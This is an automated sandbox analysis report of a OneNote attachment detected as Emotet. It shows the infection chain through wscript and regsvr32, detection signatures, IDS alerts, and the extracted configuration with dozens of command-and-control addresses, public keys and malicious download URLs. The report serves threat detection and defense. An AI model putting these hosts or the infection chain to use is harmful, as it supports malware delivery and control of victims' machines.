Edit tour

Windows Analysis Report
iMedPub_LTD_4.one

Overview

General Information

Sample Name:	iMedPub_LTD_4.one
Analysis ID:	828507
MD5:	862cfd3b3523532ba0faad1bcc568c4d
SHA1:	faa8437483dab403f6079be49758407a9d59b964
SHA256:	b7f06ac0c97b87147a07ea1471097d84445faff5d13aebc195abb3fbeaa4e526
Tags:	one
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Malicious OneNote

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Run temp file via regsvr32

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Creates a start menu entry (Start Menu\Programs\Startup)

Registers a DLL

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

ONENOTE.EXE (PID: 5000 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_4.one MD5: 8D7E99CB358318E1F38803C9E6B67867)

wscript.exe (PID: 1716 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

regsvr32.exe (PID: 3984 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 4888 cmdline: "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 1868 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RPJQOdVdSbhDZ\IMSnbfr.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

ONENOTEM.EXE (PID: 5136 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Emotet	While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.	GOLD CABIN MUMMY SPIDER Mealybug	http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1 http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/ http://ropgadget.com/posts/defensive_pcres.html https://adalogics.com/blog/the-state-of-advanced-code-injections https://asec.ahnlab.com/en/33600/	https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5UnTU9wASAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2AAAAAAAAAAA="]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
iMedPub_LTD_4.one	JoeSecurity_MalOneNote	Yara detected Malicious OneNote	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.815803054.0000000000CC1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.815608298.0000000000C90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.816093001.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Emotet_3	Yara detected Emotet	Joe Security
0000000A.00000003.341725142.00000000057F2000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x4c6:$asp_gen_obf1: "+" 0x4f6:$asp_gen_obf1: "+" 0x12aa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0x18fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0x95a:$jsp4: public 0xf9a:$jsp4: public 0x2da:$asp_input1: request 0xb08:$asp_input1: request 0xb4a:$asp_input1: request 0xc60:$asp_input1: request 0x1e3a:$asp_input1: request 0x614:$asp_payload11: wscript.shell 0x4e:$asp_multi_payload_one1: createobject 0x1fc:$asp_multi_payload_one1: createobject 0x2ea:$asp_multi_payload_one1: createobject 0x362:$asp_multi_payload_one1: createobject 0x3bc:$asp_multi_payload_one1: createobject 0x5f8:$asp_multi_payload_one1: createobject 0xd5e:$asp_multi_payload_one1: createobject 0x1096:$asp_multi_payload_one1: createobject 0x1d5c:$asp_multi_payload_one1: createobject
0000000A.00000003.339989514.0000000005873000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x7ae6:$asp_gen_obf1: "+" 0x7b16:$asp_gen_obf1: "+" 0x8b4e:$asp_gen_obf1: "+" 0x8b7e:$asp_gen_obf1: "+" 0x1244a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x1256a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x7f7a:$jsp4: public 0x85ba:$jsp4: public 0x8fe2:$jsp4: public 0x9622:$jsp4: public 0x78fa:$asp_input1: request 0x8128:$asp_input1: request 0x816a:$asp_input1: request 0x8280:$asp_input1: request 0x8962:$asp_input1: request 0x9190:$asp_input1: request 0x91d2:$asp_input1: request 0x92e8:$asp_input1: request 0x7c34:$asp_payload11: wscript.shell 0x8c9c:$asp_payload11: wscript.shell 0x781c:$asp_multi_payload_one1: createobject
0000000A.00000003.337950872.00000000057E9000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0xa2aa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0xa8fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0x8912:$jsp4: public 0x8f52:$jsp4: public 0x995a:$jsp4: public 0x9f9a:$jsp4: public 0xb4ba:$jsp4: public 0xbafa:$jsp4: public 0x85cc:$asp_payload11: wscript.shell 0x9614:$asp_payload11: wscript.shell 0xb174:$asp_payload11: wscript.shell 0x81b4:$asp_multi_payload_one1: createobject 0x82a2:$asp_multi_payload_one1: createobject 0x831a:$asp_multi_payload_one1: createobject 0x8374:$asp_multi_payload_one1: createobject 0x85b0:$asp_multi_payload_one1: createobject 0x8d16:$asp_multi_payload_one1: createobject 0x904e:$asp_multi_payload_one1: createobject 0x91fc:$asp_multi_payload_one1: createobject 0x92ea:$asp_multi_payload_one1: createobject 0x9362:$asp_multi_payload_one1: createobject
0000000A.00000003.337950872.00000000057E9000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x847e:$asp_gen_obf1: "+" 0x84ae:$asp_gen_obf1: "+" 0x94c6:$asp_gen_obf1: "+" 0x94f6:$asp_gen_obf1: "+" 0xb026:$asp_gen_obf1: "+" 0xb056:$asp_gen_obf1: "+" 0xa2aa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0xa8fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0x8912:$jsp4: public 0x8f52:$jsp4: public 0x995a:$jsp4: public 0x9f9a:$jsp4: public 0xb4ba:$jsp4: public 0xbafa:$jsp4: public 0x8292:$asp_input1: request 0x8ac0:$asp_input1: request 0x8b02:$asp_input1: request 0x8c18:$asp_input1: request 0x92da:$asp_input1: request 0x9b08:$asp_input1: request 0x9b4a:$asp_input1: request
0000000A.00000003.339286928.00000000057F0000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x32aa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0x38fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0x1912:$jsp4: public 0x1f52:$jsp4: public 0x295a:$jsp4: public 0x2f9a:$jsp4: public 0x15cc:$asp_payload11: wscript.shell 0x2614:$asp_payload11: wscript.shell 0x11b4:$asp_multi_payload_one1: createobject 0x12a2:$asp_multi_payload_one1: createobject 0x131a:$asp_multi_payload_one1: createobject 0x1374:$asp_multi_payload_one1: createobject 0x15b0:$asp_multi_payload_one1: createobject 0x1d16:$asp_multi_payload_one1: createobject 0x204e:$asp_multi_payload_one1: createobject 0x21fc:$asp_multi_payload_one1: createobject 0x22ea:$asp_multi_payload_one1: createobject 0x2362:$asp_multi_payload_one1: createobject 0x23bc:$asp_multi_payload_one1: createobject 0x25f8:$asp_multi_payload_one1: createobject 0x2d5e:$asp_multi_payload_one1: createobject
0000000A.00000003.339286928.00000000057F0000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x147e:$asp_gen_obf1: "+" 0x14ae:$asp_gen_obf1: "+" 0x24c6:$asp_gen_obf1: "+" 0x24f6:$asp_gen_obf1: "+" 0x32aa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0x38fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228 0x1912:$jsp4: public 0x1f52:$jsp4: public 0x295a:$jsp4: public 0x2f9a:$jsp4: public 0x1292:$asp_input1: request 0x1ac0:$asp_input1: request 0x1b02:$asp_input1: request 0x1c18:$asp_input1: request 0x22da:$asp_input1: request 0x2b08:$asp_input1: request 0x2b4a:$asp_input1: request 0x2c60:$asp_input1: request 0x3e3a:$asp_input1: request 0x15cc:$asp_payload11: wscript.shell 0x2614:$asp_payload11: wscript.shell
0000000C.00000002.320685564.0000000001060000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
13.2.regsvr32.exe.c90000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.1060000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.1060000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.regsvr32.exe.c90000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Sigma Signatures

Malware Analysis System Evasion

Sigma detected: Run temp file via regsvr32

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1716, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll, ProcessId: 3984, ProcessName: regsvr32.exe

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 11 - Source IP: 192.168.2.7 - Destination IP: 213.239.212.5

Timestamp:	192.168.2.7213.239.212.5497384432404320 03/17/23-09:28:02.219302
SID:	2404320
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 23 - Source IP: 192.168.2.7 - Destination IP: 91.121.146.47

Timestamp:	192.168.2.791.121.146.474970480802404344 03/17/23-09:24:48.781527
SID:	2404344
Source Port:	49704
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 7 - Source IP: 192.168.2.7 - Destination IP: 182.162.143.56

Timestamp:	192.168.2.7182.162.143.56497074432404312 03/17/23-09:25:00.477991
SID:	2404312
Source Port:	49707
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 16 - Source IP: 192.168.2.7 - Destination IP: 66.228.32.31

Timestamp:	192.168.2.766.228.32.314970670802404330 03/17/23-09:24:54.704501
SID:	2404330
Source Port:	49706
Destination Port:	7080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 5 - Source IP: 192.168.2.7 - Destination IP: 167.172.199.165

Timestamp:	192.168.2.7167.172.199.1654970980802404308 03/17/23-09:25:12.955315
SID:	2404308
Source Port:	49709
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 2 - Source IP: 192.168.2.7 - Destination IP: 104.168.155.143

Timestamp:	192.168.2.7104.168.155.1434971480802404302 03/17/23-09:25:25.962930
SID:	2404302
Source Port:	49714
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 10 - Source IP: 192.168.2.7 - Destination IP: 206.189.28.199

Timestamp:	192.168.2.7206.189.28.1994973080802404318 03/17/23-09:26:56.214746
SID:	2404318
Source Port:	49730
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: iMedPub_LTD_4.one

ReversingLabs: Detection: 30%

Antivirus detection for URL or domain

Source: https://167.172.199.165:8080//dslbwuw/s	Avira URL Cloud: Label: malware
Source: https://149.56.131.28:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://82.223.21.224:8080/	Avira URL Cloud: Label: malware
Source: https://91.207.28.33:8080/	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	Avira URL Cloud: Label: malware
Source: https://206.189.28.199:8080/	Avira URL Cloud: Label: malware
Source: https://164.90.222.65/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/tM	Avira URL Cloud: Label: malware
Source: https://103.43.75.120/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/?	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses	Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/bwuw/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	Avira URL Cloud: Label: malware
Source: https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/u	Avira URL Cloud: Label: malware
Source: https://66.228.32.31:7080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://187.63.160.88:80/g	Avira URL Cloud: Label: malware
Source: https://206.189.28.199:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/c	Avira URL Cloud: Label: malware
Source: https://213.239.212.5:443/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/	Avira URL Cloud: Label: malware
Source: https://206.189.28.199:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/0	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/	Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://103.43.75.120/	Avira URL Cloud: Label: malware
Source: https://187.63.160.88:80/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	Avira URL Cloud: Label: malware
Source: https://penshorn.org:443/admin/Ses8712iGR8du/on	Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/xM	Avira URL Cloud: Label: malware
Source: https://169.57.156.166:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/~	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: penshorn.org

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll	ReversingLabs: Detection: 58%
Source: C:\Windows\System32\RPJQOdVdSbhDZ\IMSnbfr.dll (copy)	ReversingLabs: Detection: 58%

Source: 0000000D.00000002.816093001.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5UnTU9wASAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2AAAAAAAAAAA="]}

Source: unknown	HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.7:49707 version: TLS 1.2

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180008D28 FindFirstFileExW,

12_2_0000000180008D28

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 159.65.88.10 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 164.90.222.65 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 213.239.212.5 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 186.194.240.217 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 104.168.155.143 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 159.89.202.34 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 160.16.142.56 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.121.146.47 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.207.28.33 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 103.43.75.120 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 72.15.201.15 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 163.44.196.120 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 206.189.28.199 8080	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 203.26.41.131 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 107.170.39.149 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 187.63.160.88 80	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 66.228.32.31 7080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 82.223.21.224 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 149.56.131.28 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 169.57.156.166 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 1.234.2.232 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 167.172.199.165 8080	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.7:49707 -> 182.162.143.56:443
Source: Traffic	Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.7:49704 -> 91.121.146.47:8080
Source: Traffic	Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.7:49706 -> 66.228.32.31:7080
Source: Traffic	Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.7:49709 -> 167.172.199.165:8080
Source: Traffic	Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.7:49714 -> 104.168.155.143:8080
Source: Traffic	Snort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.7:49730 -> 206.189.28.199:8080
Source: Traffic	Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.7:49738 -> 213.239.212.5:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 91.121.146.47:8080
Source: Malware configuration extractor	IPs: 66.228.32.31:7080
Source: Malware configuration extractor	IPs: 182.162.143.56:443
Source: Malware configuration extractor	IPs: 187.63.160.88:80
Source: Malware configuration extractor	IPs: 167.172.199.165:8080
Source: Malware configuration extractor	IPs: 164.90.222.65:443
Source: Malware configuration extractor	IPs: 104.168.155.143:8080
Source: Malware configuration extractor	IPs: 163.44.196.120:8080
Source: Malware configuration extractor	IPs: 160.16.142.56:8080
Source: Malware configuration extractor	IPs: 159.89.202.34:443
Source: Malware configuration extractor	IPs: 159.65.88.10:8080
Source: Malware configuration extractor	IPs: 186.194.240.217:443
Source: Malware configuration extractor	IPs: 149.56.131.28:8080
Source: Malware configuration extractor	IPs: 72.15.201.15:8080
Source: Malware configuration extractor	IPs: 1.234.2.232:8080
Source: Malware configuration extractor	IPs: 82.223.21.224:8080
Source: Malware configuration extractor	IPs: 206.189.28.199:8080
Source: Malware configuration extractor	IPs: 169.57.156.166:8080
Source: Malware configuration extractor	IPs: 107.170.39.149:8080
Source: Malware configuration extractor	IPs: 103.43.75.120:443
Source: Malware configuration extractor	IPs: 91.207.28.33:8080
Source: Malware configuration extractor	IPs: 213.239.212.5:443
Source: Malware configuration extractor	IPs: 45.235.8.30:8080
Source: Malware configuration extractor	IPs: 119.59.103.152:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 95.217.221.146:8080
Source: Malware configuration extractor	IPs: 153.126.146.25:7080
Source: Malware configuration extractor	IPs: 197.242.150.244:8080
Source: Malware configuration extractor	IPs: 202.129.205.3:8080
Source: Malware configuration extractor	IPs: 103.132.242.26:8080
Source: Malware configuration extractor	IPs: 139.59.126.41:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 183.111.227.137:8080
Source: Malware configuration extractor	IPs: 5.135.159.50:443
Source: Malware configuration extractor	IPs: 201.94.166.162:443
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 79.137.35.198:8080
Source: Malware configuration extractor	IPs: 172.105.226.75:8080
Source: Malware configuration extractor	IPs: 94.23.45.86:4143
Source: Malware configuration extractor	IPs: 115.68.227.76:8080
Source: Malware configuration extractor	IPs: 153.92.5.27:8080
Source: Malware configuration extractor	IPs: 167.172.253.162:8080
Source: Malware configuration extractor	IPs: 188.44.20.25:443
Source: Malware configuration extractor	IPs: 147.139.166.154:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 185.4.135.165:8080
Source: Malware configuration extractor	IPs: 45.176.232.124:443

Source: Joe Sandbox View

ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic

HTTP traffic detected: POST /mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56

Source: Joe Sandbox View	IP Address: 110.232.117.186 110.232.117.186
Source: Joe Sandbox View	IP Address: 103.132.242.26 103.132.242.26

Source: global traffic

HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org

Source: global traffic	TCP traffic: 192.168.2.7:49704 -> 91.121.146.47:8080
Source: global traffic	TCP traffic: 192.168.2.7:49706 -> 66.228.32.31:7080
Source: global traffic	TCP traffic: 192.168.2.7:49709 -> 167.172.199.165:8080
Source: global traffic	TCP traffic: 192.168.2.7:49714 -> 104.168.155.143:8080
Source: global traffic	TCP traffic: 192.168.2.7:49715 -> 163.44.196.120:8080
Source: global traffic	TCP traffic: 192.168.2.7:49716 -> 160.16.142.56:8080
Source: global traffic	TCP traffic: 192.168.2.7:49721 -> 159.65.88.10:8080
Source: global traffic	TCP traffic: 192.168.2.7:49726 -> 149.56.131.28:8080
